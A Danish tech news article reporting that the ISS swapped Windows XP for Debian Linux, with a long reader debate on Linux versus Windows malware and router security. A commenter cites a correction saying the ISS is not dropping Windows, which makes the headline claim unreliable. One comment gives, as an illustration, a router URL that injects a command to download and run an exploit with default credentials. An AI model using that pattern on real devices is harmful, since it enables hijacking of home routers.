Vil virus og ustabilitet til livs: Rumstation skrotter Windows til fordel for Linux

Rumstationen ISS har skiftet alle Windows XP-computere ud og er gået over til Linux.

På den internationale rumstation, ISS, blev man træt af Windows. Så træt, at man skiftede over til Linux, helt specifikt Debian 6. Det skriver extremetech.com.

Flere forskellige funktioner på ISS bliver i forvejen varetaget af forskellige Linux-systemer, som Redhat og Scientific Linux.

En talsmand for ISS udtaler, at man skiftede til Linux, da man skulle bruge et styresystem, der var stabilt og pålideligt.

ISS har tidligere haft problemer med virusinfektioner på stationens computere, og da en russisk kosmonaut i 2008 medbragte en inficeret computer, spredte virussen sig hurtigt til de andre computere.
Dette problem bliver sandsynligvis elimineret ved skiftet til Linux, vurderer Extremetech.com.

Skiftet kommer næppe som en overraskelse for nogen, da Linux er det mest brugte styresystem til videnskabelige opgaver. Cerns Large Hadron Collider kører Linux, og det samme gør Nasa.

Tips og korrekturforslag til denne historie sendes til tip@version2.dk
Kommentarer (45)
sortSortér kommentarer
  • Ældste først
  • Nyeste først
  • Bedste først
Henrik Sørensen

Er det bare mig der sidder og undrer mig i mit stille sind over en astronaut der bare kan tage en PC med virus med ombord? Tjekker de ikke ALT der skal bruges til rumfart?

... og hvis virus har bredt sig må det jo være fordi han har sluttet den til rumstationens netværk ... det kan man da kalde Bring Your Own Device ...

... og de andre andre maskiner på netværket har ikke har været beskyttede?

Men hvad har alt det med stabilitet at gøre? ... ingenting! Det handler nemlig om processer og om at følge dem og det er en helt anden sag.
Hvis vira endelig skal ind i debatten så findes de sørme også til Linux så det har næppe været argumentet for at skifte styresystem.

Så kære Version 2 stop nu med at skrive ukritisk af efter udenlandske nyheder. En forkert historie bliver ikke bedre af at blive gentaget.

  • 8
  • 26
Anonym

Jeg tror næppe at virus elementet har haft den overskyggende betydning for beslutningen. Der har nok mere ligget i at gravstenen er sat og jorden ved at være dækket over Windows XP, der ikke supporteres mere fra næste år af (dog ville jeg have en formodning om at MS måske nok uofficielt ville støtte NASA skulle det komme til det).

Men jeg forstår da godt at de skifter over til Linux når nu det meste af forsker communitiet og NASA generelt bruger Linux i forvejen - der i vil der nok ligge en stabilitet i og med at der arbejdes på og ud fra samme platform. Jo færre platforme der skal supporteres jo bedre, sikre og dermed mere stabile...

Og det med at astronauterne tager laptops med er bestemt ikke nyt. For nogle år siden var jeg til et foredrag på Århus Uni. hvor der var en NASA astronaut med, og han fortalte at man brugte alm. laptops koblet til rumfærgerne for at læse output - disse laptops kunne dog ikke sende kommandoer tilbage til skibets computere - der skulle de anvende de paneler som var meget gamle (hvilket var årsagen til at de brugte laptops til at læse output)

  • 10
  • 0
Bent Vistoft

Man tager ikke bare en tilfældig laptop med op til rumstationen. Godt nok bruges der "off-the-shelf" ThinkPads, men de er alligevel tilpasset ISS's miljø med bl. a. væsentligt forbedret køling og tilpasning til 28 volt DC.

Til gengæld er ISS WAN'et måske ikke voldsomt godt sikret, afstanden til nærmeste nabo taget i betragtning :-)

BTW: "If they take out Windows, how will they keep the air in?" - første kommentar på ExtremeTech :-)

  • 6
  • 0
Bent Vistoft

Digital Trends har postet følgende update:

[Update 5/10/13 9 p.m. EST: We heard from Kieth Chuvala below who said his comments with the Linux Foundation have been misconstrued. The ISS does use Linux as well as Windows, and has no plans to ditch Windows any time soon. This story has been updated to reflect Chuvala's correction.]

Read more: http://www.digitaltrends.com/computing/international-space-station-ditch...

  • 0
  • 0
Casper Jensen

@ Christian Nobel

Her er link til lidt historik:
http://www.neowin.net/news/a-history-of-viruses-on-linux
og
http://en.wikipedia.org/wiki/Linux_malware

Virus findes generelt fordi software er skrevet af mennesker.

Windows er lavet af mennesker
Lnux er lavet af mennesker

Jeg vil mene det er naivt at tro der ikke er virus til Linux.

I min optik, og dette har min vudering da ingen kan give noget belæg for min påstand.

Fik Linux samme sikkerheds mæssig bevågninghed som Microsoft har haft, fra blackhat milijøet, vil der formentlig kommer rigtig mange skeletter ud af skabet

  • 2
  • 9
Henrik Mikael Kristensen

Fik Linux samme sikkerheds mæssig bevågninghed som Microsoft har haft, fra blackhat milijøet, vil der formentlig kommer rigtig mange skeletter ud af skabet

Nu er det jo ret svært at gemme skeletter, når sourcen er åben, og det ville NASA helt sikkert foretrække i stedet for overraskelser i lukkede operativsystemer. Derfor er det jo også dejligt at den almindelige Linux bruger kan få gavn af et sikkerhedsfix, hvis NASA's egne udviklere sender et fix tilbage til kernel udviklerne.

Desuden tror jeg at de fleste sikkerhedsproblemer ligger over kernelniveau, dvs. i skrivebordsmiljøerne, hvor der ikke udvikles med samme disciplin som i kernelen.

  • 8
  • 0
Sune Marcher

Nu er det jo ret svært at gemme skeletter, når sourcen er åben,


Det er svært at bevidst skjule nasty ting i opensource, ja - du slipper ikke afsted med at få en reverse shell ind i Linux-kernen. Men det er ikke umuligt at få committed noget kode der pga. bugs har privilege exploits, selv med code reviews - mennesker er ikke ufejlbarlige.

Der har været flere eksempler på privilege exploit bugs i opensource der har eksisteret 10+ år før det blev opdaget (eller, rettere, før det blev opdaget af folk der havde interesse i at få fixet fejlen). F.eks. chunked-encoding bug i apache (bam, så har du en shell), og linux kernel ipx-protokol bug (bang, så blev din shell root).

Hvordan man anvender kenskab til en bug kommer ret meget an på hvad det er for et system. Til Windows giver det mening at bot-hearde fordi der er så massivt mange installs, til Linux/BSD/ZOS/whatever kan det give mere mening at holde det til meget specifikke angreb på maskiner der har interessant data.

Blot fordi der ikke er drive-by malware angreb til dit yndlings-OS betyder ingenlunde at der ikke er både applikations- og kernel-bugs at udnytte :-)

  • 6
  • 0
Marc Munk

Fik Linux samme sikkerheds mæssig bevågninghed som Microsoft har haft, fra blackhat milijøet, vil der formentlig kommer rigtig mange skeletter ud af skabet

Så det at linux findes på et hav af servere, routere og hvad har vi er ikke nok til at man skulle gide at finde huller i linux?

Det eneste tilfælde af linux malware jeg kan huske er et stykke malware der gik efter soho routere. Så vidt jeg husker kunne den kun inficerer maskiner der stadig kørte med default factory passwords, men jeg kan ikke lige finde en artikel på det så jeg kan ikke verificere det.

  • 3
  • 0
Casper Jensen

Så længe virksomheder ikke er pålagt at offentliggøre når de bliver hacked, har selv arbejde for en som nægtede, så vil sikkerhedesforskere aldrig får det komplette overblik over hvilke angreb der er derude og hvor meget det ene eller andet OS bliver hacked eller hvor mange huller de reelt egentlig har. Når det er sagt ville de nok aldirg få det overblik.
EU arbejder lige nu på et direktiv om at firmaer skal pålægges at offentliggøre hvornår og hvordan de er blevet hacked - det bliver spænende at se hvad der sker hvis det kommer igennem.
Faktisk er vi noget et niveau hvor firmaer i USA er begyndt at fyre deres IT sikkerheds personale til fordel for at tegne forsikringer mod at bliver hacked, hvor fucked er det?

Jeg arbejder både med Windows og Linux til daglig men erfarings mæssigt hviler jeg mest på Windows. Jeg må dog sige jeg bliver mere og mere glad for Linux det mere jeg brugere det.
Når det er sagt så er jeg ikke blind for hvad der er fundamentet for at et virus til OS kan eksistere, og i kan vende og dreje det som i vil, og hive op i hvor mange der ser på det osv. Men faktum er at det er lavet af mennesker og lige meget hvor mange der kigger på det vil der ALTID være fejl for vi er ikke perfekte. Om der er flere i Windows kontra Linux er en debat jeg ikke vil gå ind i, det kan ingen vide og hvilket grundlag skulle dette også undersøges på?

Jeg synes Sune Marcher beviser min pointe meget godt.

@Peter Stricker
Så lade mig spørge tilbage hvor mange eksempler jeg skal komme med til du giver mig ret? PT har jeg kommet med 14 igennem tiden.
Min pointe er jo at det kun er dem vi kender til. Denne verden er blevet til så store penge nu at det vi ser vil altid kun være toppen af isbjerget. Bare se på det store bankkup der blevet fortaget for ikke så lang tid siden og hvor organiseret det var.

@Marc Munk

Hvis du gad kigge i artiklen jeg har linket til vil du se 14 eksempler fra 1996 til 2010

Den typiske måde du ser hackere operer på er ved brug af botnet netværk.
Afpresning via DOS angreb
Påvirkning af aktier og andre ting via spam.

Hvad jeg prøver at sige er at med disse typer angreb har man brug for et nemt fundament at lægge sit botnet netværk ud på og der vælger man nok stadig windows da dette stadig er det mest udbredte OS. Vi ser dog en stigende tendens til angreb på Mac.
Så det kan godt være du ser Linux mange steder men det er nu nemmere at angribe Windows. Jeg kan skrive en exploit som jeg kan implementere et sted og på den måde bygge mit fundement, aka botnet netværk, og begynde at tjene penge. Det nemme her er brugeren. Det at brugere navigere nettet gør det nemmere for mig at angribe ham. Du taler om "atonome" enheder som ikke navigere hjemmesider og de skal angribes mere direkte hvilket kræver mere tid. Det andet er alt andet lige nemmere.

Intel har selv været ude for nogle år siden og sige at de tror i fremtiden at hackere vil ændre fokus på atonome enheder fordi de havde en forventning om at Brugerene vil blive mere og mere opmærksomme kombineret med at OSerne vil blive mere sikre samt 3ed parts beskyttelse vil blive mere effektiv. Altså det vil blive for besværligt at lave sit fundament og derfor regnede de med at de vil dreje fokus over på autonome enheder, hvilket er dem du blandt andet nævner i dit indlæg.

Og med min argumentation oven over betyder det ikke jeg mener at botnet/spam/dos er den eneste måde der angribes på derude, men det er bare den mest udbredte i min optik.

Hov og så skal jeg lige indskyde at med virus mener jeg både virus/orm/trojan m.m.

  • 2
  • 2
Peter Vangsgaard

Windows XP bør man ikke bruge til noget så kritisk mere, medmindre man skal bruge nogle af de mange andre muligheder en Linux arbejdsstation tilbyder, her tænker jeg på de ting den kan programmeres til fordi man stort set kan programmere en linux maskine til hvadsomhelst, så forstår jeg ikke hvorfor man ikke for længe siden har opgraderet til Windows 7...Windows XP bør ingen benytte idag.

  • 1
  • 0
Marc Munk

@ Casper

Jeg har kigget din liste igennem. Jeg er lidt i tvivl om hvad du vil fremtil med listen. Jeg har på intet tidspunkt benægtet at der findes malware til andre platforme end windows. Der er jo en grund til at det hedder et rootkit. :)

Uanset hvor meget du så påstår andet så er windows kun det mest udbredte desktop os. Det er ikke det mest udbredte os...

  • 5
  • 1
Daniel Udsen

Men jeg forstår da godt at de skifter over til Linux når nu det meste af forsker communitiet og NASA generelt bruger Linux i forvejen - der i vil der nok ligge en stabilitet i og med at der arbejdes på og ud fra samme platform. Jo færre platforme der skal supporteres jo bedre, sikre og dermed mere stabile...

Der er også noget med at de systemer der er bygget ind i rum fartøjer gennerelt ikke er 2år gamle standard desktops men typisk har forholdsvis lange udviklings og test programmer, jeg ville ikke blive overasket hvis nogle af de windows systmer der skiftes ud er WinNT eller W2K computere, hvis ikke endnu ældre. På den slags HW er Linux et bedre valg, end at forsøge at opdatere til nyere windows versioner.

Stabilitet og sikkerhed er sikkert bare de buzzword der er brugt for at forklare den politisk udnævte ledelse hvorfor man vil forlade storlobbyist Microsoft, den realle gund er sikkert at man ikke rigtigt har mugligheden for at hoppe med på win8 wallet garden vognen, og det er nok noget vi kommer til at se fra flere og flere at de store firmaer med en gammel IT platform.

  • 2
  • 0
Jan Harries

her gik jeg og troede at sådan nogen som nasa burde bruge en nasa modificeret hemmelig linux version, så er der jo ingen der ved noget om hvordan de skal inficere dem.. ? vej ? nej, så er det jo ligesom stop med de problemer, forever :)

  • 0
  • 3
Jesper Lund Stocholm Blogger

Så det at linux findes på et hav af servere, routere og hvad har vi er ikke nok til at man skulle gide at finde huller i linux?


Det (retoriske) spørgsmål giver kun mening, hvis du samtidig kan svare på, hvad man ønsker at få ud af at udnytte et hul samt mængden af energi du vil bruge på at finde det.

  • 1
  • 6
Marc Munk

Det (retoriske) spørgsmål giver kun mening, hvis du samtidig kan svare på, hvad man ønsker at få ud af at udnytte et hul samt mængden af energi du vil bruge på at finde det.

Det ville jo give mening hvis man læste det indlæg jeg svarer på... Der bliver fremsat en påstand om at der ikke er noget linux kasser at udnytte. Det passer bare ikke helt overens med virkeligheden.

  • 6
  • 1
Jan Poulsen

Jeg tror ikke, at den store forskel på sikkerheden ligger i om det er åben eller lukket kode. Selvom jeg ville ønske at den åbne model sejrede.

Jeg mener, at sikkerhedsmodellen i Windows er elendig. Det har den altid været.
Hvor mange af jer kører jeres Windows desktop som upriviligeret bruger ? Nej vel ? Det er uudholdeligt så derfor kører alle som administrator.
Hvor mange af jer surfer så på Internettet som root ?

Hvem gætter på, at det er nemmere at blive inficeret via et "drive-by-angreb" som administrator end som upriviligeret bruger i Linux ?

  • 2
  • 1
Casper Jensen

@ Marc Munk

Lad mig prøve at sige det på en anden måde så...

Hackerne går efter brugerne fordi det er nemmest. Brugerne sidder på Windows desktop.

Det jeg prøvede at sige handlede ikke om hvad der var "mest af" men at hackerne har mest fokus på at hacke brugerne. De fleste brugere bruger stadig Windows OS idag hvorfor dette OS er det der er mest under angreb.

min påstand er at hvis vi rettede samme antal "kanoner" mod Linux ville vi finde langt flere huller end vi kender til idag.

Jeg vil ikke diskutere om der vil blive fundet flere eller færrer huller kun at der vil blive fundet flere end vi kender til idag.

Taget i betragtning hvilket mål ISS er så tror jeg ikke man skal føle sig sikker bare fordi man vælger at gå over til Linux.

Security by obscurity er død for længst

  • 0
  • 4
Marc Munk

Jeg ser absolut ingen silverbullets nogle steder. Det er ingen hemlighed at man skal være opmærksom på middleware. Men middleware er kun "farligt" hvis det kører med for mange rettigheder eller hvis der findes et hul der kan udnyttes til at få yderligere rettigheder.

Jo mere man kan granulere rettigheder jo bedre. Her har ms fat i noget.

  • 1
  • 0
Jesper Lund Stocholm Blogger

Det ville jo give mening hvis man læste det indlæg jeg svarer på


Det gjorde jeg nu også.

Der bliver fremsat en påstand om at der ikke er noget linux kasser at udnytte. Det passer bare ikke helt overens med virkeligheden.


Placering af investering er jo reelt et nul-sums spil, så penge afgivet til at finde huller i "OS XYZ" kan ikke bruges til at finde huller i "ABC".

Du er nødt til at spørge dig selv, hvad man som "blackhat" får ud af at finde et hul i et OS.

Hvis du finder et hul i Windows, så kan de fleste dumme brugere foran skærmen hjælpe dig til at starte webbank, mail etc som du kan arbejde videre på.

Hvis du finder et hul i et OS, der er installeret på "Router XYZ" hvad får du så ud af det?

Det er klart, at det kan være nyttigt at have root-adgang til en router, men alt andet lige vil det være langt mere interessant at få adgang til en potent maskine i et privat hjem, der enten kan bruges til at angribe netbank eller deltage i massive DDOS-angreb på hvem man nu end er sur på.

Med andre ord (og jeg siger ikke, at du selv udtrykte det så firkantet), så køber jeg ikke præmissen om, at "hvis udbredelsen var betydende for antallet af fundne huller i Windows, hvorfor er der så så få huller fundet i Linux, der er installeret på tusindevis af server, routers etc?"

(og så skal vi slutteligt huske på, at langt de færreste angreb på Windows eller ethvert andet consumer-OS i dag sker via exploits af selve OS - de sker derimod via exploit af 3. partsprogrammer som Flash og Java)

  • 0
  • 3
Marc Munk

Det er klart, at det kan være nyttigt at have root-adgang til en router, men alt andet lige vil det være langt mere interessant at få adgang til en potent maskine i et privat hjem, der enten kan bruges til at angribe netbank eller deltage i massive DDOS-angreb på hvem man nu end er sur på.

Det afhænger vel helt af hvad man vil med den pågældende bot. Skal jeg bruge en bot der skal deltage i et ddos angreb er en router alt andet lige bedre end en pc der bliver tændt og slukket, hvorimod en router typisk er tændt altid.

Med andre ord (og jeg siger ikke, at du selv udtrykte det så firkantet), så køber jeg ikke præmissen om, at "hvis udbredelsen var betydende for antallet af fundne huller i Windows, hvorfor er der så så få huller fundet i Linux, der er installeret på tusindevis af server, routers etc?"

Nu er det så slet ikke en præmis jeg sætter op. Jeg prøver lige igen. Der blev fremsat en påstand om at det ikke var værd at gå efter linux grundet den lave markedsandel på desktoppen. Jeg påpeger så blot at det er lidt ngoet vrøvl grundet at når vi kommer uden for desktopen så er microsoft ikke særlig stor i forhold til andre.

  • 2
  • 0
Jesper Lund Stocholm Blogger

Jeg påpeger så blot at det er lidt ngoet vrøvl grundet at når vi kommer uden for desktopen så er microsoft ikke særlig stor i forhold til andre.


OK - men det er jo betinget af, at markedet udenfor desktoppen er lige så relevant for hackere som det på desktoppen.

Skal jeg bruge en bot der skal deltage i et ddos angreb er en router alt andet lige bedre end en pc der bliver tændt og slukket, hvorimod en router typisk er tændt altid.


Men alt andet er jo netop ikke lige. En router er jo typisk langt mindre potent end en consumer-maskine. Min egen router, der bestemt ikke er en lille djævel, har en ret begrænset processor og kun meget lidt RAM (128MB). En desktop-computer har "enorme" mængder RAM, flerkerneprocessorer og GPU'er, der kan trækkes på. Umiddelbart synes en desktop-PC at være langt mere attraktiv end end router - selvom routeren altid er tændt.

Hvorfor mener du, at en router og en PC er lige attraktive for en hacker - givet at alt andet netop ikke er lige?

  • 0
  • 5
Marc Munk

OK - men det er jo betinget af, at markedet udenfor desktoppen er lige så relevant for hackere som det på desktoppen.

Jeg er ret sikker på at en bothearder er ligeglad. Når bare de kan få maskiner ind i flokken der kan det de har brug for...

Men alt andet er jo netop ikke lige. En router er jo typisk langt mindre potent end en consumer-maskine. Min egen router, der bestemt ikke er en lille djævel, har en ret begrænset processor og kun meget lidt RAM (128MB). En desktop-computer har "enorme" mængder RAM, flerkerneprocessorer og GPU'er, der kan trækkes på. Umiddelbart synes en desktop-PC at være langt mere attraktiv end end router - selvom routeren altid er tændt.

Det kræver ikke alverden af cpu/ram at knalde en forespørgsel afsted. Vi kan jo også vende den om. Hvorfor gå efter desktops hvis det er cpu/ram man går efter. Så er en server da et meget bedre mål.

Hvorfor mener du, at en router og en PC er lige attraktive for en hacker - givet at alt andet netop ikke er lige?

Det går lidt hurtigt i dag? Jeg har jo netop været inde på at det afhænger af hvad man vil. Vil du udnytte netbanker kan en desktop være et mål. Vil man bygge et botnet udelukkende til ddos er en router for mig at se et bedre valg.

  • 3
  • 0
Peter Stricker

Så lade mig spørge tilbage hvor mange eksempler jeg skal komme med til du giver mig ret? PT har jeg kommet med 14 igennem tiden.


Jeg har ikke noget fast antal, men en virus om året er i hvert fald for lidt til, at du med nogen rimelighed kan skrive "masser af eksempler" i overskriften.

Og har du set, hvad det er for nogle vira du linker til?

1999:
No significant viruses were reported this year

At du stadig prøver at forsvare din påstand, er ... til grin!

  • 2
  • 2
Casper Jensen

End fx newz.dk

@Peter Stricker
Peter jeg vil gerne diskturer det her, men hvis det er måden du vælger at gøre det på, så har vi ikke mere at snakke om.

@Marc Munk
Du har ikke kommenteret mit sidste indlæg til dig? og jeg kan se at du med din debat med Jesper Lund Stocholm stadig fastholder hvad jeg mener er en misforståelse af hvad jeg skrev før. Eller jeg har måske overset noget?

  • 2
  • 3
Kasper Lund
  • 5
  • 0
Claus Stovgaard

Som embedded specialist, interessere jeg mig nok mere for routere en normen, men jeg kan hurtig komme med hvorfor de er interessante fra en crackers pespektiv.

Som andre har skrevet, skal der ikke meget CPU/RAM til at udnytte en privat linie maksimalt i forbindelse med et DDOS.

Tilgængelighed. Dette består bl.a. af
- SOHO routere skal være billige. Derfor spares der på ingeniør timer i design af produktet. Typisk speciel på sikkerheden. Jeg har set webinterfaces som udnytter HTTP GET direkte til shell exekvering.
- Typisk så har en udbyder som T-mobile / AT&T flere millioner af den samme type / samme firmware. E.g. få hacket den første, og sæt en fælde for resten.
Svært for brugeren at opdage. Man skal virkelig vide hvad man leder efter, for at finde en hydra på sin router.
Mange har brugt default brugernavn / kodeord. (Er ved at blive bedre, men det eksistere stadig).

I 2008 havde Sebastian Maier en god talk om emnet. http://freedom.opensourcedays.org/2008/agenda/sessions/SebastianMaier.shtml

  • 1
  • 0
Marc Munk

@Marc Munk
Du har ikke kommenteret mit sidste indlæg til dig? og jeg kan se at du med din debat med Jesper Lund Stocholm stadig fastholder hvad jeg mener er en misforståelse af hvad jeg skrev før. Eller jeg har måske overset noget?

Nej det er ikke dig der har overset noget. Det var mig der havde overset dit indlæg rettet mod mig.

De sidste 3 pointer du laver er jeg fuldstændig enig med dig i. Men jeg mener det et en forsimpling at skrive at man angriber brugeren. Har du et exploit du kan fyre af mod en given service kan du lave et lille script der kører det exploit af mod samtlige ip adresser du kan komme i nærheden af. Og i noget der ligner 4-6 gange ud af 10 vil du formentlig ramme en linux kasse af en slags.

  • 1
  • 0
Jesper Lund Stocholm Blogger

Som embedded specialist, interessere jeg mig nok mere for routere en normen, men jeg kan hurtig komme med hvorfor de er interessante fra en crackers pespektiv.


Jeg kan sagtens se argumenter for at hacke en router - mit argument er, at det giver et langt mere potent våben at hacke en desktop-PC end en router.


Det tror jeg da, at du har ret i - men det tager lissom luften ud af argumentet om, at det er Linux's skyld, at så får routere efter sigende er hacket.


Jeps - og dette gør sig i endnu større skala gældende for at finde et exploit i Windows.

Svært for brugeren at opdage. Man skal virkelig vide hvad man leder efter, for at finde en hydra på sin router.


Nu ved jeg ikke helt, hvad en "hydra" er, men det er altså ikke fordi tilstedeværelse af en trojaner eller lignende på en desktop-PC automatisk medfører skrigende bannere på skrivebordet eller at performance pludseligt går ned. Som oftest er trojaneren sovende og bliver først aktiv i de tilfælde, hvor nogen har behov for at starte bot-netværket op.

Men det rejser da et interessant spørgsmål: når nu de færreste routere har AV-programmer installeret, så ved ingen vel reelt, hvor mange routerer, der er hacket?

Mange har brugt default brugernavn / kodeord. (Er ved at blive bedre, men det eksistere stadig).


Nu er min primære beskæftigelse ikke at arbejde med routere, men jeg har endnu til gode at se en SOHO-router, der tillader adgang fra andet en enten et kablet netværk eller via WIFI fra det lokale net. Har jeg bare været heldig, eller er det normen, at man nu eksponerer sin router til internettet, når den er startet første gang?

  • 1
  • 1
Jesper Lund Stocholm Blogger

Hvorfor gå efter desktops hvis det er cpu/ram man går efter. Så er en server da et meget bedre mål.


Jeps - spørgsmålet er jo igen, om det er indsatsen værd at hacke en server? Servere er typisk sat op af folk, der har i hvert fald en smule forstand på, hvad de laver ... i modsætning til desktop-brugere, der enten bruger det OS med den opsætning, som fulgte med fra butikken eller har installeret OS selv med dettes standardindstillinger.

Det er muligt, at en server er 10x mere potent end en desktop-PC, men hvis du for samme indsats kan få fat i 10 desktop-PC'er, så synes dette at være at foretrække frem for serveren.

Nu ved jeg godt, at det var mig selv, der nævnte DDOS, men husk også på, at der er andre formål med botnet - ét andet kunne være distribueret dekryptering af filer og andet processor-intensivt arbejde.

  • 0
  • 1
Claus Stovgaard

Jeg kan sagtens se argumenter for at hacke en router - mit argument er, at det giver et langt mere potent våben at hacke en desktop-PC end en router.

Det er jeg helt enig i. Så snart man ikke skal bruge den som en proxy, eller som en del af et botnet til DDNS, så er en router rimelig værdiløs. Så snart der skal laves noget som helst andet end at flytte netværkspakker, så forsvinder ideen med den.

Det tror jeg da, at du har ret i - men det tager lissom luften ud af argumentet om, at det er Linux's skyld, at så får routere efter sigende er hacket.

Jeps - og dette gør sig i endnu større skala gældende for at finde et exploit i Windows.

Sikkerheden er aldrig stærkere end det svageste led. Og selvom man har en rimelig stærk linux kerne, giver det ingen sikkerhed hvis man har et piv åben webinterface kørende ovenpå. Så Linux i sig selv giver ingen sikkerhed. Linux giver dog muligheden for at lave en meget sikker SOHO router hvis man lyster. Jeg har generelt benyttet OpenWRT når jeg har muligheden for det - https://openwrt.org/ Jeg har så konfigureret dem uden web interface, og begrænset adgangen til SSH med nøgler (Ingen password basseret login). Det betyder at den firmware er rimelig unik, og med en meget lille angrebsvinkel.

Så sat lidt på spidsen, håber jeg at ved en SOHO router med Linux, kan man enten håbe på producenten har taget nok fra open source miljøet til en sikker platform, eller man kan lave sin egen firmware hvis ikke man er tilfreds med mulighederne og sikkerheden i den firmware fra producenten. Det skal tages med et gran salt, da det vil være langt de færeste som lige kan lave en custom linux til en router.

Med hensyn til hvor mange routere der er angrebet. Så ved man det netop ikke. Og tro mig, de fleste tele udbydere vil holde kortene meget tæt til kroppen hvis deres valgte SOHO router har et problem. Så giver dig helt ret i, at det er meget svært at bestemme hvor mange routere som bliver udnyttet til andet formål.

Nu er min primære beskæftigelse ikke at arbejde med routere, men jeg har endnu til gode at se en SOHO-router, der tillader adgang fra andet en enten et kablet netværk eller via WIFI fra det lokale net. Har jeg bare været heldig, eller er det normen, at man nu eksponerer sin router til internettet, når den er startet første gang?

Min henvisning til standard kodeordet var heller ikke til direkte adgang. Ideen er et pull/push angreb. Hvis du sidder inde bag ved, og lave et pull i form af noget noget kode der beder din brower om at lave et push til din router. Kunne f.eks. være et kald til "http://192.168.1.1/exec.cgi?user=admin&pass=admin&cmd='wget -P /tmp/ http://path/to/exploit/ && tar xvpf /tmp/exploit.tar && /tmp/exploit'" Og selvfølgelig ignore det hvis den fejler. Dette er selvfølgelig forsimplet, men pointen er der.

  • 0
  • 0
Peter Lind

Altså ud fra en opfattelse af, at almindelige bruger med det samme vil opdage, at der er en trojaner på deres desktopmaskine? Den opfattelse mener jeg bestemt er forkert.

Det er muligt, men du dodgede stadigvæk første del af spørgsmålet. Hvad med om du faktisk svarer i stedet for bare at pille den del ud du lige kunne spinne til egen fordel?

Derudover er der kommet langt større fokus på malware og det har en langt større plads i folks bevidsthed end tidligere. Ydermere er der bedre værktøjer, inkl. ting fra OS producenterne selv, der øger chancen for hurtigere at opdage malware. Men der er stort set ingen bevidsthed om at den router du kører er et OS du skal kunne stole på.

  • 0
  • 0
Jesper Lund Stocholm Blogger

Det er muligt, men du dodgede stadigvæk første del af spørgsmålet. Hvad med om du faktisk svarer i stedet for bare at pille den del ud du lige kunne spinne til egen fordel?


Jeg svarede nu et andet sted - men jeg gentager det da gerne: jeg kan sagtens se gode grunde til at hacke en router - jeg har svært ved at se, at disse skulle gøre dem mere interessante end at hacke en desktop-PC.

  • 1
  • 2
Peter Lind

Jeg svarede nu et andet sted - men jeg gentager det da gerne: jeg kan sagtens se gode grunde til at hacke en router - jeg har svært ved at se, at disse skulle gøre dem mere interessante end at hacke en desktop-PC.

Fair nok - det er bare ikke lige til at se at resten er underforstået, når du hiver en specifik del ud :) En "se svar andetsteds" note ville nok være meget god.

  1. Routere er perfekte til MitM angreb. Specielt med mere intelligente angreb (div SSL angreb, eksempelvis) bliver det rigtig interessant at kigge på MitM angreb via routere
  2. Der er større fokus på desktop-sikkerhed end på router sikkerhed. Den "almindelige" bruger har en chance for at installere antivirus på sin computer - men tænker endnu mindre over det i forhold til sin router. For ikke at nævne at du ikke bare kan installere antivirus på den eller scanne den
  3. Ved at kompromittere en router og lave angreb den vej vil du ofte få adgang til angribe flere computere - mens du ved at kompromittere en desktop computer bagefter skal kompromittere den næste, og så den næste, etc.

Der er stadig en overflod af angreb mod desktops, fordi det stadig er alt for nemt og der er tradition for det. Men jeg har svært ved at se at det skulle være så meget mindre interessant at hacke en router - tværtimod.

  • 2
  • 0
Casper Jensen

@Marck Munck og Peter Lind

Vi glemmer vist lidt udgangs punktet nu..

Det der trickede mig var følgende ordlyd i artiklen:

Dette problem bliver sandsynligvis elimineret ved skiftet til Linux

Samt Christians Nobel indlæg om at man skal kunne bakke sin påstand op.

Her mener han den forrige poster som påstod der så sandelig også var Vira til Linux.

(Jeg beklager jeg ikke bruger quotes men jeg fatter ikke systemet her :))

Nu er vi så endt med at sammenligne det OS der kører på en router op imod Windows XP - det synes jeg ikke er fair.

En mere fair betragtning ville være fx ubuntu desktop op imod windows xp eller windows generelt for den sags skyld.

Min pointe var bare at man ikke kan føle sig sikker bare fordi man kører Linux og specielt ikke når man arbejde et så eftertragtet sted (set med hacker øjne) som ISS / NASA

Kan vi blive enige om det er korrekt?

  • 1
  • 0
Log ind eller Opret konto for at kommentere
Jobfinder Logo
Job fra Jobfinder

Call to action

På den internationale rumstation, ISS, blev man træt af Windows. Så træt, at man skiftede over til Linux, helt specifikt Debian 6. Det skriver extremetech.com. Flere forskellige funktioner på ISS bliver i forvejen varetaget af forskellige Linux-systemer, som Redhat og Scientific Linux. En talsmand
for ISS udtaler, at man skiftede til Linux, da man skulle bruge et styresystem, der var stabilt og pålideligt. ISS har tidligere haft problemer med virusinfektioner på stationens computere, og da en russisk kosmonaut i 2008 medbragte en inficeret computer, spredte virussen sig hurtigt til de andre computere. Dette problem bliver sandsynligvis elimineret ved skiftet til Linux, vurderer Extreme...